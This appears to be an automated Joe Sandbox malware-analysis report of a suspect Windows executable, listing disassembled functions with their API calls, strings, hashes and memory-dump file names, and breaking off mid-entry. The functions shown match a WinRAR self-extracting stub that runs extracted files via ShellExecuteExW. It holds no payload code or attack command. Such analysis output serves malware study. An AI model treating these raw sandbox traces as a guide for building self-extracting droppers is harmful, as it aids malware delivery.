SizeofResource.KERNEL32(00000000,?,?,?,00DDB73D,00000066), ref: 00DDA6EC
LoadResource.KERNEL32(00000000,?,?,?,00DDB73D,00000066), ref: 00DDA703
LockResource.KERNEL32(00000000,?,?,?,00DDB73D,00000066), ref: 00DDA712
GlobalAlloc.KERNELBASE(00000002,00000000,?,?,?,?,?,00DDB73D,00000066), ref: 00DDA72D
GlobalLock.KERNEL32(00000000), ref: 00DDA73E
CreateStreamOnHGlobal.COMBASE(00000000,00000000,?), ref: 00DDA762
GlobalUnlock.KERNEL32(00000000), ref: 00DDA7C6

Part of subcall function 00DDA626: GdipAlloc.GDIPLUS(00000010), ref: 00DDA62C

GdipCreateHBITMAPFromBitmap.GDIPLUS(?,?,00FFFFFF), ref: 00DDA7A7
GlobalFree.KERNEL32(00000000), ref: 00DDA7CD

Strings

PNG, xrefs: 00DDA6C6

Memory Dump Source

Source File: 00000000.00000002.1763183414.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true

Associated: 00000000.00000002.1763168846.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763210072.0000000000DF3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763229154.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763229154.0000000000E05000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763229154.0000000000E22000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763280792.0000000000E23000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_dc0000_gkcQYEdJSO.jbxd

Similarity

API ID: Global$Resource$AllocCreateGdipLock$BitmapFindFreeFromLoadSizeofStreamUnlock
String ID: PNG
API String ID: 211097158-364855578
Opcode ID: c3141f099e5fc9b26797d2e4a5f02d2b6a105d3193bfa6741ea1ed102d739f4b
Instruction ID: 7991a5a4f63d3bc65f36ef5856145ef98597463ab1a08e60ad87eb57608f3803
Opcode Fuzzy Hash: c3141f099e5fc9b26797d2e4a5f02d2b6a105d3193bfa6741ea1ed102d739f4b
Instruction Fuzzy Hash: E5318F75600702BFD7109F25EC88D2B7BB9EF84760B05851AF905D2720EB31DD48CAB2

Function 00DCA69B Relevance: 7.6, APIs: 5, Instructions: 105
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FindFirstFileW.KERNELBASE(?,?,?,?,?,?,00DCA592,000000FF,?,?), ref: 00DCA6C4

Part of subcall function 00DCBB03: _wcslen.LIBCMT ref: 00DCBB27

FindFirstFileW.KERNELBASE(?,?,?,?,00000800,?,?,?,?,00DCA592,000000FF,?,?), ref: 00DCA6F2
GetLastError.KERNEL32(?,?,00000800,?,?,?,?,00DCA592,000000FF,?,?), ref: 00DCA6FE
FindNextFileW.KERNEL32(?,?,?,?,?,?,00DCA592,000000FF,?,?), ref: 00DCA728
GetLastError.KERNEL32(?,?,?,?,00DCA592,000000FF,?,?), ref: 00DCA734

Memory Dump Source

Source File: 00000000.00000002.1763183414.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true

Associated: 00000000.00000002.1763168846.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763210072.0000000000DF3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763229154.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763229154.0000000000E05000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763229154.0000000000E22000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763280792.0000000000E23000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_dc0000_gkcQYEdJSO.jbxd

Similarity

API ID: FileFind$ErrorFirstLast$Next_wcslen
String ID:
API String ID: 42610566-0
Opcode ID: 3d40632d219a2f6a409dbfc7476482b6d4ba70a0388bebf940108b2135fcaa21
Instruction ID: aa2309080249c780d7c11a5885875206e22dd6c45dd51708e57c713629d4b809
Opcode Fuzzy Hash: 3d40632d219a2f6a409dbfc7476482b6d4ba70a0388bebf940108b2135fcaa21
Instruction Fuzzy Hash: 3B416E7690055AABCB25DF68CC84BEAB7B8FB48354F14419AE55DE3240D734AE90CFA0

Function 00DE7DEE Relevance: 4.5, APIs: 3, Instructions: 20COMMONLIBRARYCODE

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(00000000,?,00DE7DC4,00000000,00DFC300,0000000C,00DE7F1B,00000000,00000002,00000000), ref: 00DE7E0F
TerminateProcess.KERNEL32(00000000,?,00DE7DC4,00000000,00DFC300,0000000C,00DE7F1B,00000000,00000002,00000000), ref: 00DE7E16
ExitProcess.KERNEL32 ref: 00DE7E28

Memory Dump Source

Source File: 00000000.00000002.1763183414.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true

Associated: 00000000.00000002.1763168846.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763210072.0000000000DF3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763229154.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763229154.0000000000E05000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763229154.0000000000E22000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763280792.0000000000E23000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_dc0000_gkcQYEdJSO.jbxd

Similarity

API ID: Process$CurrentExitTerminate
String ID:
API String ID: 1703294689-0
Opcode ID: ff7b12623fda375ca9c38feadb0b35817733fd0d62b546918c8f4f90023bf0fd
Instruction ID: 522bb882bf87b083b2f24c5280601a0427c99c5b75446447815f06f66bd4b95a
Opcode Fuzzy Hash: ff7b12623fda375ca9c38feadb0b35817733fd0d62b546918c8f4f90023bf0fd
Instruction Fuzzy Hash: B5E04631000288ABCF417F61CD0AA5A3F6AEF00741B058455F809CA232CB36EEA2CBB0

Function 00DC848E Relevance: 2.5, APIs: 1, Instructions: 960COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00DC8493

Memory Dump Source

Source File: 00000000.00000002.1763183414.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true

Associated: 00000000.00000002.1763168846.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763210072.0000000000DF3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763229154.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763229154.0000000000E05000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763229154.0000000000E22000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763280792.0000000000E23000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_dc0000_gkcQYEdJSO.jbxd

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: e18304193d38f8e65f00276071f1d0a89ddbda510841b63053459232a28a092d
Instruction ID: 1062d8e9faf69152bc6ecad76079a6d18b117e75763f6dfa9799693746d549be
Opcode Fuzzy Hash: e18304193d38f8e65f00276071f1d0a89ddbda510841b63053459232a28a092d
Instruction Fuzzy Hash: CF82D770904287AEDF15DB64C895FFABBB9AF05300F0C41BDE8499B282DB715A85DB70

Function 00DDB7E0 Relevance: 102.2, APIs: 48, Strings: 10, Instructions: 731windowfilesleepCOMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00DDB7E5

Part of subcall function 00DC1316: GetDlgItem.USER32(00000000,00003021), ref: 00DC135A
Part of subcall function 00DC1316: SetWindowTextW.USER32(00000000,00DF35F4), ref: 00DC1370

SetDlgItemTextW.USER32(?,00000001,00000000), ref: 00DDB8D1
GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00DDB8EF
IsDialogMessageW.USER32(?,?), ref: 00DDB902
TranslateMessage.USER32(?), ref: 00DDB910
DispatchMessageW.USER32(?), ref: 00DDB91A
GetDlgItemTextW.USER32(?,00000066,?,00000800), ref: 00DDB93D
KiUserCallbackDispatcher.NTDLL(?,00000001), ref: 00DDB960
GetDlgItem.USER32(?,00000068), ref: 00DDB983
SendMessageW.USER32(00000000,000000B1,00000000,000000FF), ref: 00DDB99E
SendMessageW.USER32(00000000,000000C2,00000000,00DF35F4), ref: 00DDB9B1

Part of subcall function 00DDD453: _wcslen.LIBCMT ref: 00DDD47D

SetFocus.USER32(00000000), ref: 00DDB9B8
_swprintf.LIBCMT ref: 00DDBA24

Part of subcall function 00DC4092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00DC40A5

Part of subcall function 00DDD4D4: GetDlgItem.USER32(00000068,00E1FCB8), ref: 00DDD4E8
Part of subcall function 00DDD4D4: ShowWindow.USER32(00000000,00000005,?,?,?,00DDAF07,00000001,?,?,00DDB7B9,00DF506C,00E1FCB8,00E1FCB8,00001000,00000000,00000000), ref: 00DDD510
Part of subcall function 00DDD4D4: SendMessageW.USER32(00000000,000000B1,00000000,000000FF), ref: 00DDD51B
Part of subcall function 00DDD4D4: SendMessageW.USER32(00000000,000000C2,00000000,00DF35F4), ref: 00DDD529
Part of subcall function 00DDD4D4: SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 00DDD53F
Part of subcall function 00DDD4D4: SendMessageW.USER32(00000000,0000043A,00000000,?), ref: 00DDD559
Part of subcall function 00DDD4D4: SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 00DDD59D
Part of subcall function 00DDD4D4: SendMessageW.USER32(00000000,000000C2,00000000,?), ref: 00DDD5AB
Part of subcall function 00DDD4D4: SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 00DDD5BA
Part of subcall function 00DDD4D4: SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 00DDD5E1
Part of subcall function 00DDD4D4: SendMessageW.USER32(00000000,000000C2,00000000,00DF43F4), ref: 00DDD5F0

GetLastError.KERNEL32(?,00000000,00000000,00000000,?), ref: 00DDBA68
GetLastError.KERNEL32(?,?,00000000,00000000,00000000,?), ref: 00DDBA90
GetTickCount.KERNEL32 ref: 00DDBAAE
_swprintf.LIBCMT ref: 00DDBAC2
GetLastError.KERNEL32(?,00000011), ref: 00DDBAF4
GetModuleFileNameW.KERNEL32(00000000,?,00000800,?,?,?,00000000,00000000,00000000,?), ref: 00DDBB43
_swprintf.LIBCMT ref: 00DDBB7C
CreateFileMappingW.KERNEL32(000000FF,00000000,08000004,00000000,00007104,winrarsfxmappingfile.tmp), ref: 00DDBBD0
GetCommandLineW.KERNEL32 ref: 00DDBBEA
MapViewOfFile.KERNEL32(00000000,00000002,00000000,00000000,00000000,?), ref: 00DDBC47
ShellExecuteExW.SHELL32(0000003C), ref: 00DDBC6F
Sleep.KERNEL32(00000064), ref: 00DDBCB9
UnmapViewOfFile.KERNEL32(?,?,0000430C,?,00000080), ref: 00DDBCE2
CloseHandle.KERNEL32(00000000), ref: 00DDBCEB
_swprintf.LIBCMT ref: 00DDBD1E
SetDlgItemTextW.USER32(?,00000001,00000000), ref: 00DDBD7D
SetDlgItemTextW.USER32(?,00000065,00DF35F4), ref: 00DDBD94
GetDlgItem.USER32(?,00000065), ref: 00DDBD9D
GetWindowLongW.USER32(00000000,000000F0), ref: 00DDBDAC
SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 00DDBDBB
SetDlgItemTextW.USER32(?,00000001,00000000), ref: 00DDBE68
_wcslen.LIBCMT ref: 00DDBEBE
_swprintf.LIBCMT ref: 00DDBEE8
SendMessageW.USER32(?,00000080,00000001,?), ref: 00DDBF32
SendDlgItemMessageW.USER32(?,0000006C,00000172,00000000,?), ref: 00DDBF4C
GetDlgItem.USER32(?,00000068), ref: 00DDBF55
SendMessageW.USER32(00000000,00000435,00000000,00400000), ref: 00DDBF6B
GetDlgItem.USER32(?,00000066), ref: 00DDBF85
SetWindowTextW.USER32(00000000,00E0A472), ref: 00DDBFA7
SetDlgItemTextW.USER32(?,0000006B,00000000), ref: 00DDC007
SetDlgItemTextW.USER32(?,00000001,00000000), ref: 00DDC01A
DialogBoxParamW.USER32(LICENSEDLG,00000000,Function_0001B5C0,00000000,?), ref: 00DDC0BD
EnableWindow.USER32(00000000,00000000), ref: 00DDC197
SendMessageW.USER32(?,00000111,00000001,00000000), ref: 00DDC1D9

Part of subcall function 00DDC73F: __EH_prolog.LIBCMT ref: 00DDC744

SetDlgItemTextW.USER32(?,00000001,00000000), ref: 00DDC1FD

Strings

C:\Users\user\Desktop, xrefs: 00DDBBC9
__tmp_rar_sfx_access_check_%u, xrefs: 00DDBAB5
STARTDLG, xrefs: 00DDB801
%s, xrefs: 00DDBED8
<, xrefs: 00DDBB84
-el -s2 "-d%s" "-sp%s", xrefs: 00DDBB6B
LICENSEDLG, xrefs: 00DDC0B2
winrarsfxmappingfile.tmp, xrefs: 00DDBBA6
"%s"%s, xrefs: 00DDBD0D
@, xrefs: 00DDBB91

Memory Dump Source

Source File: 00000000.00000002.1763183414.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true

Associated: 00000000.00000002.1763168846.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763210072.0000000000DF3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763229154.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763229154.0000000000E05000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763229154.0000000000E22000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763280792.0000000000E23000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_dc0000_gkcQYEdJSO.jbxd

Similarity

API ID: Message$ItemSend$Text$Window$_swprintf$File$ErrorLast$DialogH_prologLongView_wcslen$CallbackCloseCommandCountCreateDispatchDispatcherEnableExecuteFocusHandleLineMappingModuleNameParamShellShowSleepTickTranslateUnmapUser__vswprintf_c_l
String ID: %s$"%s"%s$-el -s2 "-d%s" "-sp%s"$<$@$C:\Users\user\Desktop$LICENSEDLG$STARTDLG$__tmp_rar_sfx_access_check_%u$winrarsfxmappingfile.tmp
API String ID: 3445078344-2238251102
Opcode ID: d68c040c6d6cf44cdaca6b5a4c5d464529d6c7c2b5f62b65b7653cd12cd66a00
Instruction ID: b6e4add27d62140bc775c95860ff6018c03fb1482cf47b6d50ef2de5970f3974
Opcode Fuzzy Hash: d68c040c6d6cf44cdaca6b5a4c5d464529d6c7c2b5f62b65b7653cd12cd66a00
Instruction Fuzzy Hash: 2B420470944349BEEB219BB19C4AFBE7B6CEB01704F04405BF645B62D2CB759A88CB71

Function 00DD0863 Relevance: 52.8, APIs: 23, Strings: 7, Instructions: 316
libraryfileloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleW.KERNEL32(kernel32), ref: 00DD087C
GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 00DD088E
GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 00DD08BF
GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 00DD0B69
CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00DD0B83
SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 00DD0B93
ReadFile.KERNEL32(00000000,?,00007FFE,00DF3C7C,00000000), ref: 00DD0BB1
CloseHandle.KERNEL32(00000000), ref: 00DD0C09
GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 00DD0C1E
CompareStringW.KERNEL32(00000400,00001001,?,?,DXGIDebug.dll,?,00DF3C7C,?,00000000,?,00000800), ref: 00DD0C72
GetFileAttributesW.KERNELBASE(?,?,00DF3C7C,00000800,?,00000000,?,00000800), ref: 00DD0C9C
GetFileAttributesW.KERNEL32(?,?,00DF3D44,00000800), ref: 00DD0CD8

Part of subcall function 00DD081B: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 00DD0836
Part of subcall function 00DD081B: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,00DCF2D8,Crypt32.dll,00000000,00DCF35C,?,?,00DCF33E,?,?,?), ref: 00DD0858

_swprintf.LIBCMT ref: 00DD0D4A
_swprintf.LIBCMT ref: 00DD0D96

Part of subcall function 00DC4092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00DC40A5

AllocConsole.KERNEL32 ref: 00DD0D9E
GetCurrentProcessId.KERNEL32 ref: 00DD0DA8
AttachConsole.KERNEL32(00000000), ref: 00DD0DAF
_wcslen.LIBCMT ref: 00DD0DC4
GetStdHandle.KERNEL32(000000F4,?,00000000,?,00000000), ref: 00DD0DD5
WriteConsoleW.KERNEL32(00000000), ref: 00DD0DDC
Sleep.KERNEL32(00002710), ref: 00DD0DE7
FreeConsole.KERNEL32 ref: 00DD0DED
ExitProcess.KERNEL32 ref: 00DD0DF5

Strings

kernel32, xrefs: 00DD0873
DXGIDebug.dll, xrefs: 00DD08FC, 00DD0C5E
SetDefaultDllDirectories, xrefs: 00DD08B9
Please remove %s from %s folder. It is unsecure to run %s until it is done., xrefs: 00DD0D84
SetDllDirectoryW, xrefs: 00DD0888
uxtheme.dll, xrefs: 00DD0D17
dwmapi.dll, xrefs: 00DD0927, 00DD0D0D

Memory Dump Source

Source File: 00000000.00000002.1763183414.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true

Associated: 00000000.00000002.1763168846.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763210072.0000000000DF3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763229154.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763229154.0000000000E05000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763229154.0000000000E22000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763280792.0000000000E23000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_dc0000_gkcQYEdJSO.jbxd

Similarity

API ID: File$Console$HandleModule$AddressAttributesNameProcProcess_swprintf$AllocAttachCloseCompareCreateCurrentDirectoryExitFreeLibraryLoadPointerReadSleepStringSystemWrite__vswprintf_c_l_wcslen
String ID: DXGIDebug.dll$Please remove %s from %s folder. It is unsecure to run %s until it is done.$SetDefaultDllDirectories$SetDllDirectoryW$dwmapi.dll$kernel32$uxtheme.dll
API String ID: 1207345701-3298887752
Opcode ID: 27aac32611c963287b4ff64d316ffe3bc7b505711102f171a31bc22742a76e7d
Instruction ID: c9edca385d1ca3d900e4b6f09ed34482a21e298b76a92ca929cd7891c959421c
Opcode Fuzzy Hash: 27aac32611c963287b4ff64d316ffe3bc7b505711102f171a31bc22742a76e7d
Instruction Fuzzy Hash: 1FD155B1444389ABD3209F54C849BAFBAE8EF85704F53891EF38997350DB708649CB76

Function 00DDC73F Relevance: 47.7, APIs: 23, Strings: 4, Instructions: 428
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__EH_prolog.LIBCMT ref: 00DDC744

Part of subcall function 00DDB314: ExpandEnvironmentStringsW.KERNEL32(00000000,?,00001000), ref: 00DDB3FB

_wcslen.LIBCMT ref: 00DDCA0A
_wcslen.LIBCMT ref: 00DDCA13
SetWindowTextW.USER32(?,?), ref: 00DDCA71
_wcslen.LIBCMT ref: 00DDCAB3
_wcsrchr.LIBVCRUNTIME ref: 00DDCBFB
GetDlgItem.USER32(?,00000066), ref: 00DDCC36
SetWindowTextW.USER32(00000000,?), ref: 00DDCC46
SendMessageW.USER32(00000000,00000143,00000000,00E0A472), ref: 00DDCC54
SendMessageW.USER32(00000000,00000143,00000000,?), ref: 00DDCC7F

Strings

%s.%d.tmp, xrefs: 00DDC940
<br>, xrefs: 00DDC9D4
ProgramFilesDir, xrefs: 00DDCB45
Software\Microsoft\Windows\CurrentVersion, xrefs: 00DDCB1A

Memory Dump Source

Source File: 00000000.00000002.1763183414.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true

Associated: 00000000.00000002.1763168846.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763210072.0000000000DF3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763229154.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763229154.0000000000E05000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763229154.0000000000E22000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763280792.0000000000E23000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_dc0000_gkcQYEdJSO.jbxd

Similarity

API ID: _wcslen$MessageSendTextWindow$EnvironmentExpandH_prologItemStrings_wcsrchr
String ID: %s.%d.tmp$<br>$ProgramFilesDir$Software\Microsoft\Windows\CurrentVersion
API String ID: 2804936435-312220925
Opcode ID: 7be3ae530da5e41d38236016cad6cbdfcc3df24921ad3976c970c9ce423ac5df
Instruction ID: cdd7688d88456ae87615698181e479f0531ca5fe4a7aa86ae0e2d48296fd5522
Opcode Fuzzy Hash: 7be3ae530da5e41d38236016cad6cbdfcc3df24921ad3976c970c9ce423ac5df
Instruction Fuzzy Hash: 2BE13F72900259AADF25EBA4DC85EEE73BCEB04350F4481A7F649E7140EB749A84CF70

Function 00DCDA67 Relevance: 23.4, APIs: 4, Strings: 9, Instructions: 663COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00DCDA70
GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 00DCDAAC

Part of subcall function 00DCC29A: _wcslen.LIBCMT ref: 00DCC2A2

Part of subcall function 00DD05DA: _wcslen.LIBCMT ref: 00DD05E0

Part of subcall function 00DD1B84: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,?,?,?,?,00DCBAE9,00000000,?,?,?,00010466), ref: 00DD1BA0

_wcslen.LIBCMT ref: 00DCDDE9
__fprintf_l.LIBCMT ref: 00DCDF1C

Strings

*messages***, xrefs: 00DCDBFA
, xrefs: 00DCDD6C
$%s:, xrefs: 00DCDEFF
,, xrefs: 00DCDF57
@%s:, xrefs: 00DCDF06, 00DCDF12
a, xrefs: 00DCDC16
RTL, xrefs: 00DCDEDE
R, xrefs: 00DCDC0C
*messages***, xrefs: 00DCDBC1

Memory Dump Source

Source File: 00000000.00000002.1763183414.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true

Associated: 00000000.00000002.1763168846.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763210072.0000000000DF3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763229154.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763229154.0000000000E05000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763229154.0000000000E22000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763280792.0000000000E23000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_dc0000_gkcQYEdJSO.jbxd

Similarity

API ID: _wcslen$ByteCharFileH_prologModuleMultiNameWide__fprintf_l
String ID: $ ,$$%s:$*messages***$*messages***$@%s:$R$RTL$a
API String ID: 566448164-801612888
Opcode ID: 01a21807edc44444bd908e557add3980f3c3beb4faac1609d4b0d3da13c6099c
Instruction ID: 14f079471fcaa826c9471f8da56549f12e50d07a85f490457ff42d1ca91970f6
Opcode Fuzzy Hash: 01a21807edc44444bd908e557add3980f3c3beb4faac1609d4b0d3da13c6099c
Instruction Fuzzy Hash: 9232C0B190021AABCB24EF68CC45FEA77A9EF14700F49416EF94597281E7B1DD85CBB0

Function 00DDD4D4 Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 97
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00DDB568: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 00DDB579
Part of subcall function 00DDB568: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00DDB58A
Part of subcall function 00DDB568: IsDialogMessageW.USER32(00010466,?), ref: 00DDB59E
Part of subcall function 00DDB568: TranslateMessage.USER32(?), ref: 00DDB5AC
Part of subcall function 00DDB568: DispatchMessageW.USER32(?), ref: 00DDB5B6

GetDlgItem.USER32(00000068,00E1FCB8), ref: 00DDD4E8
ShowWindow.USER32(00000000,00000005,?,?,?,00DDAF07,00000001,?,?,00DDB7B9,00DF506C,00E1FCB8,00E1FCB8,00001000,00000000,00000000), ref: 00DDD510
SendMessageW.USER32(00000000,000000B1,00000000,000000FF), ref: 00DDD51B
SendMessageW.USER32(00000000,000000C2,00000000,00DF35F4), ref: 00DDD529
SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 00DDD53F
SendMessageW.USER32(00000000,0000043A,00000000,?), ref: 00DDD559
SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 00DDD59D
SendMessageW.USER32(00000000,000000C2,00000000,?), ref: 00DDD5AB
SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 00DDD5BA
SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 00DDD5E1
SendMessageW.USER32(00000000,000000C2,00000000,00DF43F4), ref: 00DDD5F0

Strings

\, xrefs: 00DDD549

Memory Dump Source

Source File: 00000000.00000002.1763183414.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true

Associated: 00000000.00000002.1763168846.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763210072.0000000000DF3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763229154.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763229154.0000000000E05000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763229154.0000000000E22000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763280792.0000000000E23000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_dc0000_gkcQYEdJSO.jbxd

Similarity

API ID: Message$Send$DialogDispatchItemPeekShowTranslateWindow
String ID: \
API String ID: 3569833718-2967466578
Opcode ID: 6420bf4c7cf8747fcb73481581c8f52460d9586bd27e1a69885eb7c8ed4aca60
Instruction ID: 6f6cff8bf863804c764ec261efbce0c666754aef9faf22fcb43fb0d26036a681
Opcode Fuzzy Hash: 6420bf4c7cf8747fcb73481581c8f52460d9586bd27e1a69885eb7c8ed4aca60
Instruction Fuzzy Hash: 8E31E271145342BFE311DF31EC4AFAB7FACEB86714F000509F691A6291DB698A0D8B76

Function 00DDD78F Relevance: 14.2, APIs: 6, Strings: 2, Instructions: 184
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_wcslen.LIBCMT ref: 00DDD7AE
ShellExecuteExW.SHELL32(?), ref: 00DDD8DE
ShowWindow.USER32(?,00000000), ref: 00DDD91D
GetExitCodeProcess.KERNEL32(?,?), ref: 00DDD959
CloseHandle.KERNEL32(?), ref: 00DDD97F
ShowWindow.USER32(?,00000001), ref: 00DDD9E1

Strings

.exe, xrefs: 00DDD989
.inf, xrefs: 00DDD89A

Memory Dump Source

Source File: 00000000.00000002.1763183414.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true

Associated: 00000000.00000002.1763168846.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763210072.0000000000DF3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763229154.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763229154.0000000000E05000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763229154.0000000000E22000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763280792.0000000000E23000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_dc0000_gkcQYEdJSO.jbxd

Similarity

API ID: ShowWindow$CloseCodeExecuteExitHandleProcessShell_wcslen
String ID: .exe$.inf
API String ID: 36480843-3750412487
Opcode ID: 27111191029bcfe64c25ed77fe61e4137f29a0ae8d7846695cc9589823cb01c3
Instruction ID: 2b80b03689943787225e01a6d8118c1c783f22ace8f0749458348c1ee4537c7e
Opcode Fuzzy Hash: 27111191029bcfe64c25ed77fe61e4137f29a0ae8d7846695cc9589823cb01c3
